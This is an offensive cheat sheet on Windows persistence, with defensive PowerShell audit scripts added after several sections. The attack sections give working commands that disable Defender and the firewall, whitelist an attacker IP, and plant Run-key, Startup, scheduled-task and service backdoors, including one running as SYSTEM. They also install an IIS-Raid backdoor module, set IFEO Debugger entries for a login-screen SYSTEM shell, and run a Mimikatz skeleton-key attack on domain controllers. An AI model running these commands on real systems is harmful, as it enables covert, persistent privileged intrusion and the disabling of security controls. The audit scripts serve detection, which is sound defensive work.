# Windows - Persistence
## Tools
## Disable Windows Defender

```powershell
sc config WinDefend start= disabled
sc stop WinDefend
Set-MpPreference -DisableRealtimeMonitoring $true
```
## Disable Windows Firewall

```powershell
Netsh Advfirewall show allprofiles
NetSh Advfirewall set allprofiles state off
# ip whitelisting
New-NetFirewallRule -Name morph3inbound -DisplayName morph3inbound -Enabled True -Direction Inbound -Protocol ANY -Action Allow -Profile ANY -RemoteAddress ATTACKER_IP
```
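Added audit example, not part of the original cheat sheet: it checks a host for the three changes above (WinDefend disabled, real-time monitoring off, firewall profiles off) and lists inbound allow rules of the same shape as the `morph3inbound` rule. It assumes the Defender and NetSecurity modules are present (Windows 10 / Server 2016 and later).

```powershell
# Added defender-side audit; not code from the original page.
function Get-DefenderTamperReport {
    $report = [ordered]@{}

    # Start type "Disabled" is what 'sc config WinDefend start= disabled' leaves behind.
    $svc = Get-Service -Name WinDefend -ErrorAction SilentlyContinue
    $report.WinDefend = if ($svc) { "$($svc.Status) / $($svc.StartType)" } else { 'service not found' }

    # RealTimeProtectionEnabled = False matches 'Set-MpPreference -DisableRealtimeMonitoring $true'.
    $mp = Get-MpComputerStatus -ErrorAction SilentlyContinue
    $report.RealTimeProtection = if ($mp) { $mp.RealTimeProtectionEnabled } else { 'unavailable' }

    # Profiles with Enabled = False match 'netsh advfirewall set allprofiles state off'.
    $report.DisabledFirewallProfiles = @(
        Get-NetFirewallProfile | Where-Object { $_.Enabled -eq 'False' } | Select-Object -ExpandProperty Name
    )

    # Enabled inbound allow rules for any protocol that are scoped to specific remote
    # addresses: a whitelist for a single external host looks exactly like this.
    $report.ScopedInboundAllowRules = @(
        Get-NetFirewallRule -Direction Inbound -Action Allow -Enabled True -ErrorAction SilentlyContinue |
            Where-Object {
                ($_ | Get-NetFirewallPortFilter).Protocol -eq 'Any' -and
                ($_ | Get-NetFirewallAddressFilter).RemoteAddress -ne 'Any'
            } |
            ForEach-Object {
                '{0} <- {1}' -f $_.Name, ((($_ | Get-NetFirewallAddressFilter).RemoteAddress) -join ',')
            }
    )
    [pscustomobject]$report
}

Get-DefenderTamperReport | Format-List
```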
## Userland

### Set a file as hidden

```powershell
attrib +h c:\autoexec.bat
```
### Registry

Create a REG_SZ value in the Run key within HKCU\Software\Microsoft\Windows.

```
Value name: Backdoor
Value data: C:\Users\Rasta\AppData\Local\Temp\backdoor.exe
```
#### Using SharPersist

```powershell
SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m add
SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m add -o env
SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "logonscript" -m add
```
### Startup

Create a batch script in the user startup folder.

```powershell
PS C:\> gc "C:\Users\Rasta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\backdoor.bat"
start /b C:\Users\Rasta\AppData\Local\Temp\backdoor.exe
```

#### Using SharPersist

```powershell
SharPersist -t startupfolder -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "Some File" -m add
```
### Scheduled Task

```powershell
PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Users\Rasta\AppData\Local\Temp\backdoor.exe"
PS C:\> $T = New-ScheduledTaskTrigger -AtLogOn -User "Rasta"
PS C:\> $P = New-ScheduledTaskPrincipal "Rasta"
PS C:\> $S = New-ScheduledTaskSettingsSet
PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S
PS C:\> Register-ScheduledTask Backdoor -InputObject $D
```
#### Using SharPersist

```powershell
# Add to a current scheduled task
SharPersist -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add
# Add new task
SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add
SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add -o hourly
```
## Serviceland

### IIS

IIS Raid – Backdooring IIS Using Native Modules

```powershell
$ git clone https://github.com/0x09AL/IIS-Raid
$ python iis_controller.py --url http://192.168.1.11/ --password SIMPLEPASS
C:\Windows\system32\inetsrv\APPCMD.EXE install module /name:Module Name /image:"%windir%\System32\inetsrv\IIS-Backdoor.dll" /add:true
```
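Added audit example, not from the original page or the IIS-Raid project: it enumerates the global native modules that `APPCMD install module` registers and flags any whose image sits outside the inetsrv directory or is not Microsoft-signed. The APPCMD line above drops the DLL into inetsrv itself, so the signature check is the one that matters. It assumes the WebAdministration module that ships with IIS.

```powershell
# Added audit of IIS global native modules; not code from the original page.
function Get-SuspiciousIISModules {
    Import-Module WebAdministration -ErrorAction Stop
    $inetsrv = Join-Path $env:windir 'System32\inetsrv'
    foreach ($module in Get-WebGlobalModule) {
        # Image paths are stored with %windir% unexpanded.
        $image = [Environment]::ExpandEnvironmentVariables($module.Image)
        $reasons = @()
        if ($image -notlike "$inetsrv\*") { $reasons += 'image outside inetsrv' }
        if (Test-Path -LiteralPath $image) {
            # Stock IIS modules are catalog-signed by Microsoft; a third-party DLL is not.
            $sig = Get-AuthenticodeSignature -FilePath $image
            if ($sig.Status -ne 'Valid' -or $sig.SignerCertificate.Subject -notmatch 'Microsoft') {
                $reasons += "signature: $($sig.Status) ($($sig.SignerCertificate.Subject))"
            }
        } else {
            $reasons += 'image missing on disk'
        }
        if ($reasons.Count) {
            [pscustomobject]@{ Module = $module.Name; Image = $image; Reasons = $reasons -join '; ' }
        }
    }
}

Get-SuspiciousIISModules | Format-Table -AutoSize -Wrap
```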
### Windows Service

#### Using SharPersist

```powershell
SharPersist -t service -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Service" -m add
```
## Elevated

### HKLM

Similar to HKCU. Create a REG_SZ value in the Run key within HKLM\Software\Microsoft\Windows.

```
Value name: Backdoor
Value data: C:\Windows\Temp\backdoor.exe
```
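Added audit example covering the HKCU Run key, the HKLM Run key and the Startup folder techniques above; it is not code from the original page. It collects every autostart entry from those locations and reports the ones whose executable lives in a user-writable directory (the Temp and AppData paths used above) or fails Authenticode verification. The user-writable patterns are a heuristic chosen here, not something the page defines.

```powershell
# Added autostart audit; not code from the original page.
$runKeys = @(
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run'
)
# Per-user and all-users Startup folders (backdoor.bat above lives in the first one).
$startupDirs = @(
    "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup",
    "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"
)
# Heuristic (assumption): directories an unprivileged user can write to.
$userWritable = '\\Temp\\', '\\AppData\\', '\\Users\\Public\\'

function Get-CommandExecutable([string]$cmd) {
    # First quoted token, otherwise the first whitespace-delimited token.
    if ($cmd -match '^\s*"([^"]+)"') { return $Matches[1] }
    return ($cmd -split '\s+', 2)[0]
}

function Get-AutostartFindings {
    # Registry values: everything under the Run keys except the PS* provider metadata.
    $entries = @(foreach ($key in $runKeys) {
        if (-not (Test-Path $key)) { continue }
        foreach ($p in (Get-ItemProperty -Path $key).PSObject.Properties) {
            if ($p.Name -notlike 'PS*') { [pscustomobject]@{ Source = $key; Name = $p.Name; Command = [string]$p.Value } }
        }
    })
    # Startup folder items: the file itself is what runs at logon.
    $entries += @(foreach ($dir in $startupDirs) {
        Get-ChildItem -Path $dir -File -ErrorAction SilentlyContinue |
            ForEach-Object { [pscustomobject]@{ Source = $dir; Name = $_.Name; Command = $_.FullName } }
    })
    foreach ($e in $entries) {
        $exe = [Environment]::ExpandEnvironmentVariables((Get-CommandExecutable $e.Command))
        $reasons = @()
        if ($exe -match ($userWritable -join '|')) { $reasons += 'user-writable path' }
        if (Test-Path -LiteralPath $exe) {
            $sig = Get-AuthenticodeSignature -FilePath $exe   # .bat files come back NotSigned
            if ($sig.Status -ne 'Valid') { $reasons += "signature: $($sig.Status)" }
        } else { $reasons += 'target missing' }
        if ($reasons.Count) { $e | Add-Member -NotePropertyName Reasons -NotePropertyValue ($reasons -join '; ') -PassThru }
    }
}

Get-AutostartFindings | Format-Table -AutoSize -Wrap
```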
### Services

Create a service that will start automatically or on-demand.

```powershell
PS C:\> New-Service -Name "Backdoor" -BinaryPathName "C:\Windows\Temp\backdoor.exe" -Description "Nothing to see here."
```
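Added audit example, not from the original page: it lists services whose binary runs from a user-writable directory and pulls recent service installations from the System log, where the Service Control Manager writes event 7045 for every new service (including one created with `New-Service` as above). The path patterns are a heuristic chosen here.

```powershell
# Added service audit; not code from the original page.
function Get-SuspiciousServices {
    # Heuristic (assumption): service images under Temp, AppData or Public are rarely legitimate.
    Get-CimInstance -ClassName Win32_Service |
        Where-Object { $_.PathName -match '\\Temp\\|\\AppData\\|\\Users\\Public\\' } |
        Select-Object Name, DisplayName, StartMode, StartName, PathName
}

function Get-RecentServiceInstalls([int]$Hours = 24) {
    # Event 7045 is logged regardless of audit policy; its parameters are, in order:
    # service name, image path, service type, start type, account.
    $filter = @{ LogName = 'System'; Id = 7045; StartTime = (Get-Date).AddHours(-$Hours) }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        [pscustomobject]@{
            Time        = $_.TimeCreated
            ServiceName = $_.Properties[0].Value
            ImagePath   = $_.Properties[1].Value
            StartType   = $_.Properties[3].Value
            Account     = $_.Properties[4].Value
        }
    }
}

Get-SuspiciousServices | Format-Table -AutoSize -Wrap
Get-RecentServiceInstalls | Format-Table -AutoSize -Wrap
```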
### Scheduled Tasks

Scheduled Task to run as SYSTEM, everyday at 9am.

```powershell
PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Windows\Temp\backdoor.exe"
PS C:\> $T = New-ScheduledTaskTrigger -Daily -At 9am
PS C:\> $P = New-ScheduledTaskPrincipal "NT AUTHORITY\SYSTEM" -RunLevel Highest
PS C:\> $S = New-ScheduledTaskSettingsSet
PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S
PS C:\> Register-ScheduledTask Backdoor -InputObject $D
```
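Added audit example covering both the userland and the elevated scheduled-task registrations above; it is not code from the original page. It walks every task outside the `\Microsoft\` folder and reports actions that run from user-writable paths, hide the payload behind a `cmd.exe /c` wrapper, or run with an elevated principal, and it also reads Security event 4698 (task created), which requires the "Audit Other Object Access Events" policy. The path patterns are a heuristic chosen here.

```powershell
# Added scheduled-task audit; not code from the original page.
$userWritable = '\\Temp\\', '\\AppData\\', '\\Users\\Public\\'   # heuristic (assumption)

function Get-SuspiciousScheduledTasks {
    Get-ScheduledTask | Where-Object { $_.TaskPath -notlike '\Microsoft\*' } | ForEach-Object {
        $task = $_
        foreach ($action in $task.Actions) {
            if (-not $action.Execute) { continue }   # skip COM-handler actions
            $cmdLine = ('{0} {1}' -f $action.Execute, $action.Arguments).Trim()
            $reasons = @()
            if ($cmdLine -match ($userWritable -join '|')) { $reasons += 'user-writable path' }
            # Both registrations above wrap the payload in cmd.exe /c, so the trusted
            # binary is what the task shows and the payload is only in the arguments.
            if ($action.Execute -match 'cmd(\.exe)?$' -and $action.Arguments -match '^\s*/c') {
                $reasons += 'cmd.exe /c wrapper'
            }
            if ($task.Principal.UserId -match 'SYSTEM|S-1-5-18' -or $task.Principal.RunLevel -eq 'Highest') {
                $reasons += "elevated principal ($($task.Principal.UserId), $($task.Principal.RunLevel))"
            }
            if ($reasons.Count) {
                [pscustomobject]@{
                    Task    = $task.TaskPath + $task.TaskName
                    Author  = $task.Author
                    Trigger = ($task.Triggers | ForEach-Object { $_.CimClass.CimClassName }) -join ','
                    Command = $cmdLine
                    Reasons = $reasons -join '; '
                }
            }
        }
    }
}

function Get-RecentTaskCreations([int]$Hours = 24) {
    # 4698 carries the full task XML in its message; the first line names the task.
    $filter = @{ LogName = 'Security'; Id = 4698; StartTime = (Get-Date).AddHours(-$Hours) }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
        Select-Object TimeCreated, @{ n = 'Summary'; e = { ($_.Message -split "`n")[0] } }
}

Get-SuspiciousScheduledTasks | Format-Table -AutoSize -Wrap
Get-RecentTaskCreations | Format-Table -AutoSize -Wrap
```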
### Binary Replacement

#### Binary Replacement on Windows XP+

| Feature | Executable |
|---|---|
| Sticky Keys | C:\Windows\System32\sethc.exe |
| Accessibility Menu | C:\Windows\System32\utilman.exe |
| On-Screen Keyboard | C:\Windows\System32\osk.exe |
| Magnifier | C:\Windows\System32\Magnify.exe |
| Narrator | C:\Windows\System32\Narrator.exe |
| Display Switcher | C:\Windows\System32\DisplaySwitch.exe |
| App Switcher | C:\Windows\System32\AtBroker.exe |
#### Binary Replacement on Windows 10+

Exploit a DLL hijacking vulnerability in the On-Screen Keyboard osk.exe executable: create a malicious HID.dll at C:\Program Files\Common Files\microsoft shared\ink\HID.dll.
### RDP Backdoor

#### utilman.exe

At the login screen, press Windows Key+U, and you get a cmd.exe window as SYSTEM.

```powershell
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f
```

#### sethc.exe

Hit F5 a bunch of times when you are at the RDP login screen.

```powershell
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f
```
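Added audit example covering the accessibility-binary table, the osk.exe HID.dll hijack and the two IFEO Debugger entries above; it is not code from the original page. For each executable in the table it reports any Image File Execution Options `Debugger` value and verifies that the on-disk binary still carries a valid Microsoft signature, which catches both the IFEO variant and an outright file replacement; a final check looks for the HID.dll hijack path.

```powershell
# Added accessibility-backdoor audit; not code from the original page.
$accessibilityBinaries = 'sethc.exe', 'utilman.exe', 'osk.exe', 'Magnify.exe',
                         'Narrator.exe', 'DisplaySwitch.exe', 'AtBroker.exe'
$ifeoRoot = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'

function Get-AccessibilityBackdoorFindings {
    foreach ($name in $accessibilityBinaries) {
        $path = Join-Path $env:windir "System32\$name"
        $finding = [ordered]@{ Binary = $name; Debugger = $null; Signature = $null; Signer = $null; Suspicious = $false }

        # IFEO: a Debugger value means the listed program starts instead of the binary.
        $ifeoKey = "$ifeoRoot\$name"
        if (Test-Path $ifeoKey) {
            $dbg = (Get-ItemProperty -Path $ifeoKey -ErrorAction SilentlyContinue).Debugger
            if ($dbg) { $finding.Debugger = $dbg; $finding.Suspicious = $true }
        }

        # File replacement: the genuine binaries verify against Microsoft's catalog signature.
        if (Test-Path -LiteralPath $path) {
            $sig = Get-AuthenticodeSignature -FilePath $path
            $finding.Signature = $sig.Status
            $finding.Signer    = $sig.SignerCertificate.Subject
            if ($sig.Status -ne 'Valid' -or $sig.SignerCertificate.Subject -notmatch 'Microsoft') {
                $finding.Suspicious = $true
            }
        } else {
            $finding.Signature = 'missing'
        }
        [pscustomobject]$finding
    }
}

# DLL hijack variant for osk.exe: the page's hijack path is a HID.dll under the "ink" common-files directory.
function Test-InkHidHijack {
    $hijackPath = Join-Path $env:ProgramFiles 'Common Files\microsoft shared\ink\HID.dll'
    [pscustomobject]@{ Path = $hijackPath; Present = (Test-Path -LiteralPath $hijackPath) }
}

Get-AccessibilityBackdoorFindings | Format-Table -AutoSize -Wrap
Test-InkHidHijack
```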
### Skeleton Key

```powershell
# Exploitation command run as DA:
Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName <DCs FQDN>
# Access using the password "mimikatz"
Enter-PSSession -ComputerName <AnyMachineYouLike> -Credential <Domain>\Administrator
```
## References

- A view of persistence - Rastamouse
- Windows Persistence Commands - Pwn Wiki
- SharPersist: Windows Persistence Toolkit in C# - Brett Hawkins
- IIS Raid – Backdooring IIS Using Native Modules - 19/02/2020
- Old Tricks Are Always Useful: Exploiting Arbitrary File Writes with Accessibility Tools - Apr 27, 2020 - @phraaaaaaa